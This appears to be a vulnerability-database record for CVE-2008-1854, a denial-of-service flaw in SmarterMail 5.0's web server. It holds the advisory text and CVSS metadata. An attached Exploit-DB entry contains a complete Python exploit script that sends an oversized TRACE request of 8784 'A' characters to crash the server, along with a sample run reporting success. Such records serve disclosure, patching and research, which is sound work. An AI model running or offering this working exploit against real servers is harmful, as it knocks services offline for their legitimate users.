ID CVE-2008-1854 Type cve Reporter cve@mitre.org Modified 2017-08-08T01:30:00
Description
Unspecified vulnerability in SmarterMail Web Server (SMWebSvr.exe) in SmarterMail 5.0.2999 allows remote attackers to cause a denial of service (service termination) via a long HTTP (1) GET, (2) HEAD, (3) PUT, (4) POST, or (5) TRACE request. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
{"id": "CVE-2008-1854", "bulletinFamily": "NVD", "title": "CVE-2008-1854", "description": "Unspecified vulnerability in SmarterMail Web Server (SMWebSvr.exe) in SmarterMail 5.0.2999 allows remote attackers to cause a denial of service (service termination) via a long HTTP (1) GET, (2) HEAD, (3) PUT, (4) POST, or (5) TRACE request. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", "published": "2008-04-16T19:05:00", "modified": "2017-08-08T01:30:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1854", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/29732", "https://exchange.xforce.ibmcloud.com/vulnerabilities/41710", "http://www.securityfocus.com/bid/28610"], "cvelist": ["CVE-2008-1854"], "type": "cve", "lastseen": "2020-10-03T11:50:59", "edition": 3, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:31607"]}], "modified": "2020-10-03T11:50:59", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2020-10-03T11:50:59", "rev": 2}, "vulnersScore": 5.5}, "cpe": ["cpe:/a:smartertools:smartermail:5.0.2999"], "affectedSoftware": [{"cpeName": "smartertools:smartermail", "name": "smartertools smartermail", "operator": "eq", "version": "5.0.2999"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:smartertools:smartermail:5.0.2999:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:smartertools:smartermail:5.0.2999:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-03T15:04:00", "description": "SmarterTools SmarterMail 5.0 HTTP Request Handling Denial Of Service Vulnerability. CVE-2008-1854. Dos exploit for windows platform", "published": "2008-04-04T00:00:00", "type": "exploitdb", "title": "SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial Of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1854"], "modified": "2008-04-04T00:00:00", "id": "EDB-ID:31607", "href": "https://www.exploit-db.com/exploits/31607/", "sourceData": "source: http://www.securityfocus.com/bid/28610/info\r\n\r\nSmarterTools SmarterMail is prone to a denial-of-service vulnerability when handling specially crafted HTTP GET, HEAD, PUT, POST, and TRACE requests. When the server eventually resets the request connection, it will crash.\r\n\r\nRemote attackers can exploit this issue to deny service to legitimate users.\r\n\r\nSmarterMail 5.0 is vulnerable; other versions may also be affected. \r\n\r\n#!/usr/bin/python\r\n##########################################################################\r\n#\r\n# SmarterMail Web Server 5.0 DoS exploit\r\n# Tested on version 5.0.2999, OS: Windows XPSP2 English\r\n# Tested with GET,HEAD,PUT,POST,TRACE\r\n#\r\n# Bug discovered by Matteo Memelli aka ryujin\r\n# http://www.gray-world.net http://www.be4mind.com\r\n#\r\n##########################################################################\r\n#\r\n# bt ~ # ./smartermail_dos.py -H 192.168.1.245 -P 9998\r\n# [+] Connecting to 192.168.1.245 on port 9998\r\n# [+] Starting DoS attack, it can take some minutes...\r\n# [+] Evil buf sent!\r\n# [+] Now we must wait for a connection reset to crash the server...\r\n# [+] Server Di3d: Connection reset by peer\r\n# [+] The attack took 113 secs\r\n#\r\n##########################################################################\r\n\r\nfrom socket import *\r\nfrom optparse import OptionParser\r\nimport sys, time\r\n\r\nusage = \"%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]\"\r\nparser = OptionParser(usage=usage)\r\nparser.add_option(\"-H\", \"--target_host\", type=\"string\",\r\n action=\"store\", dest=\"HOST\",\r\n help=\"Target Host\")\r\nparser.add_option(\"-P\", \"--target_port\", type=\"int\",\r\n action=\"store\", dest=\"PORT\",\r\n help=\"Target Port\")\r\n(options, args) = parser.parse_args()\r\nHOST = options.HOST\r\nPORT = options.PORT\r\nif not (HOST and PORT):\r\n parser.print_help()\r\n sys.exit()\r\n\r\npayload = 'A'*8784\r\nprint \"[+] Connecting to %s on port %d\" % (HOST, PORT)\r\nprint \"[+] Starting DoS attack, it can take some minutes...\"\r\ntimestart = time.time()\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\ns.send('TRACE ' + payload+\"\\r\\n\\r\\n\")\r\nprint \"[+] Evil buf sent!\"\r\nprint \"[+] Now we must wait for a connection reset to crash the \r\nserver...\"\r\n\r\n# IF WE DONT WAIT FOR A CONNECTION RESET THE SERVER WONT CRASH\r\ntry:\r\n data=s.recv(1024)\r\nexcept error,e:\r\n print \"[+] Server Di3d: \", e[1]\r\n print \"[+] The attack took %d secs\" % int(time.time() - timestart)\r\nelse:\r\n print \"[-] Attack was not successful!\" \r\n s.close()\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31607/"}]}
